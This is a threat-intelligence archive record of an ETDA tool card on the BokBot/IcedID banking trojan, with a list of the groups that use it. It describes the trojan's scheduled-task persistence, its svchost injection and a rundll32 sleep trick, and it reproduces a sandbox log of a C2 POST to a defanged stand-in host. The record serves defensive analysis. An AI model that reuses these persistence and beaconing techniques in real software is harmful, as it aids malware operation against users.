{ "id": "da3e8b77-c7dc-4637-86ce-2c9b226aa686", "created_at": "2026-04-06T00:15:18.1517Z", "updated_at": "2026-04-10T03:37:23.877862Z", "deleted_at": null, "sha1_hash": "361a12e030c6a57777ab71dbb1e7d06180861c7b", "title": "Threat Group Cards: A Threat Actor Encyclopedia", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 64761, "plain_text": "Threat Group Cards: A Threat Actor Encyclopedia\r\nArchived: 2026-04-05 20:40:32 UTC\r\nHome \u003e List all groups \u003e List all tools \u003e List all groups using tool BokBot\r\n Tool: BokBot\r\nNames\r\nBokBot\r\nIcedID\r\nIceID\r\nCategory Malware\r\nType Banking trojan\r\nDescription Analysis Observations:\r\n• It sets up persistence by creating a Scheduled Task with the following characteristics:\r\n• Name: Update\r\n• Trigger: At Log on\r\n• Action: %LocalAppData%\\$Example\\\\waroupada.exe /i\r\n• Conditions: Stop if the computer ceases to be idle.\r\n• The sub-directory within %LocalAppdata%, Appears to be randomly picked from the\r\nlist of directories within %ProgramFiles%. This needs more verification.\r\n• The filename remained static during analysis.\r\n• The original malware exe (ex. waroupada.exe) will spawn an instance of svchost.exe as\r\na sub-process and then inject/execute its malicious code within it\r\n• If “/i” is not passed as an argument, it sets up persistence and waits for reboot.\r\n• If “/I” is passed as an argument (as is the case when the scheduled task is triggered at\r\nlogin), it skips persistence setup and actually executes; resulting in C2 communication.\r\n• Employs an interesting method for sleeping by calling the Sleep function of kernel32.dll\r\nfrom the shell, like so:\r\nrundll32.exe kernel32,Sleep -s\r\n• Setup a local listener to proxy traffic on 127.0.0.1:50000\r\n**[Example Log from C2 Network Communication]**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] connect\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: POST\r\n/forum/posting.php?\r\na=0\u0026b=4FC0302F4C59D8CDB8\u0026d=0\u0026e=63\u0026f=0\u0026g=0\u0026h=0\u0026r=0\u0026i=266390\u0026j=11\r\nHTTP/1.1\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv:\r\nhttps://apt.etda.or.th/cgi-bin/listgroups.cgi?u=f1341974-6e5c-4254-8f53-b231fcda1bd1\r\nPage 1 of 4\n\nConnection: close\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv:\nContent-Type: application/x-www-form-urlencoded\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv:\nContent-Length: 196\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Host:\nevil.com\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv:\n\u003c(POSTDATA)\u003e\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: POST\ndata stored to:\n/var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info:\n**Request URL: hxxps://evil.com/forum/posting.php?\na=0\u0026b=4FC0302F4C59D8CDB8\u0026d=0\u0026e=63\u0026f=0\u0026g=0\u0026h=0\u0026r=0\u0026i=266390\u0026j=11**\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info:\nSending fake file configured for extension 'php'.\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send:\nHTTP/1.1 200 OK\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send:\nContent-Type: text/html\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send:\nServer: INetSim HTTPs Server\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Date:\nMon, 19 Mar 2018 16:45:55 GMT\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send:\nConnection: Close\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send:\nContent-Length: 258\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info:\nSending file: /var/lib/inetsim/http/fakefiles/sample.html\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] stat: 1\n**method=POST url=hxxps://evil.com/forum/posting.php?\na=0\u0026b=4FC0302F4C59D8CDB8\u0026d=0\u0026e=63\u0026f=0\u0026g=0\u0026h=0\u0026r=0\u0026i=266390\u0026j=11**\nsent=/var/lib/inetsim/http/fakefiles/sample.html\npostdata=/var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2\nInformation https://apt.etda.or.th/cgi-bin/listgroups.cgi?u=f1341974-6e5c-4254-8f53-b231fcda1bd1\nPage 2 of 4\n\nMalpedia AlienVault OTX Last change to this tool card: 15 February 2023\nDownload this tool card in JSON format\nAll groups using tool BokBot\nChanged Name Country Observed\nAPT groups\n TA2101, Maze Team [Unknown] 2019-Feb 2024\nOther groups\n Lunar Spider 2019\n TA551, Shathak 2016-Jan 2021\n3 groups listed (1 APT, 2 other, 0 unknown)\nhttps://apt.etda.or.th/cgi-bin/listgroups.cgi?u=f1341974-6e5c-4254-8f53-b231fcda1bd1\nPage 3 of 4\n\nSource: https://apt.etda.or.th/cgi-bin/listgroups.cgi?u=f1341974-6e5c-4254-8f53-b231fcda1bd1\r\nhttps://apt.etda.or.th/cgi-bin/listgroups.cgi?u=f1341974-6e5c-4254-8f53-b231fcda1bd1\r\nPage 4 of 4", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA" ], "references": [ "https://apt.etda.or.th/cgi-bin/listgroups.cgi?u=f1341974-6e5c-4254-8f53-b231fcda1bd1" ], "report_names": [ "listgroups.cgi?u=f1341974-6e5c-4254-8f53-b231fcda1bd1" ], "threat_actors": [ { "id": "26a04131-2b8c-4e5d-8f38-5c58b86f5e7f", "created_at": "2022-10-25T15:50:23.579601Z", "updated_at": "2026-04-10T02:00:05.360509Z", "deleted_at": null, "main_name": "TA551", "aliases": [ "TA551", "GOLD CABIN", "Shathak" ], "source_name": "MITRE:TA551", "tools": [ "QakBot", "IcedID", "Valak", "Ursnif" ], "source_id": "MITRE", "reports": null }, { "id": "c2385aea-d30b-4dbc-844d-fef465cf3ea9", "created_at": "2023-01-06T13:46:38.916521Z", "updated_at": "2026-04-10T02:00:03.144667Z", "deleted_at": null, "main_name": "LUNAR SPIDER", "aliases": [ "GOLD SWATHMORE" ], "source_name": "MISPGALAXY:LUNAR SPIDER", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e9f85280-337c-4321-b872-0919f8ef64a6", "created_at": "2022-10-25T16:07:24.261761Z", "updated_at": "2026-04-10T02:00:04.914455Z", "deleted_at": null, "main_name": "TA2101", "aliases": [ "Gold Village", "Maze Team", "TA2101", "Twisted Spider" ], "source_name": "ETDA:TA2101", "tools": [ "7-Zip", "Agentemis", "BokBot", "Buran", "ChaCha", "Cobalt Strike", "CobaltStrike", "Egregor", "IceID", "IcedID", "Mimikatz", "PsExec", "SharpHound", "VegaLocker", "WinSCP", "cobeacon", "nmap" ], "source_id": "ETDA", "reports": null }, { "id": "7cfe3bc9-7a6c-4ee1-a635-5ea7b947147f", "created_at": "2024-06-19T02:03:08.122318Z", "updated_at": "2026-04-10T02:00:03.652418Z", "deleted_at": null, "main_name": "GOLD SWATHMORE", "aliases": [ "Lunar Spider " ], "source_name": "Secureworks:GOLD SWATHMORE", "tools": [ "Cobalt Strike", "GlobeImposter", "Gozi", "Gozi Trojan", "IcedID", "Latrodectus", "TrickBot" ], "source_id": "Secureworks", "reports": null }, { "id": "475ea823-9e47-4098-b235-0900bc1a5362", "created_at": "2022-10-25T16:07:24.506596Z", "updated_at": "2026-04-10T02:00:05.015497Z", "deleted_at": null, "main_name": "Lunar Spider", "aliases": [ "Gold SwathMore" ], "source_name": "ETDA:Lunar Spider", "tools": [ "BokBot", "IceID", "IcedID", "NeverQuest", "Vawtrak", "grabnew" ], "source_id": "ETDA", "reports": null }, { "id": "40b623c7-b621-48db-b55b-dd4f6746fbc6", "created_at": "2024-06-19T02:03:08.017681Z", "updated_at": "2026-04-10T02:00:03.665818Z", "deleted_at": null, "main_name": "GOLD CABIN", "aliases": [ "Shathak", "TA551 " ], "source_name": "Secureworks:GOLD CABIN", "tools": [], "source_id": "Secureworks", "reports": null }, { "id": "90f216f2-4897-46fc-bb76-3acae9d112ca", "created_at": "2023-01-06T13:46:39.248936Z", "updated_at": "2026-04-10T02:00:03.260122Z", "deleted_at": null, "main_name": "GOLD CABIN", "aliases": [ "Shakthak", "TA551", "ATK236", "G0127", "Monster Libra" ], "source_name": "MISPGALAXY:GOLD CABIN", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "c3c864b3-fac9-4d56-8500-7c06c829fbf8", "created_at": "2023-01-06T13:46:39.071873Z", "updated_at": "2026-04-10T02:00:03.203749Z", "deleted_at": null, "main_name": "TA2101", "aliases": [ "GOLD VILLAGE", "Storm-0216", "DEV-0216", "UNC2198", "TUNNEL SPIDER", "Maze Team", "TWISTED SPIDER" ], "source_name": "MISPGALAXY:TA2101", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "04e34cab-3ee4-4f06-a6f6-5cdd7eccfd68", "created_at": "2022-10-25T16:07:24.578896Z", "updated_at": "2026-04-10T02:00:05.039955Z", "deleted_at": null, "main_name": "TA551", "aliases": [ "G0127", "Gold Cabin", "Monster Libra", "Shathak", "TA551" ], "source_name": "ETDA:TA551", "tools": [ "BokBot", "CRM", "Gozi", "Gozi CRM", "IceID", "IcedID", "Papras", "Snifula", "Ursnif", "Valak", "Valek" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434518, "ts_updated_at": 1775792243, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/361a12e030c6a57777ab71dbb1e7d06180861c7b.pdf", "text": "https://archive.orkl.eu/361a12e030c6a57777ab71dbb1e7d06180861c7b.txt", "img": "https://archive.orkl.eu/361a12e030c6a57777ab71dbb1e7d06180861c7b.jpg" } }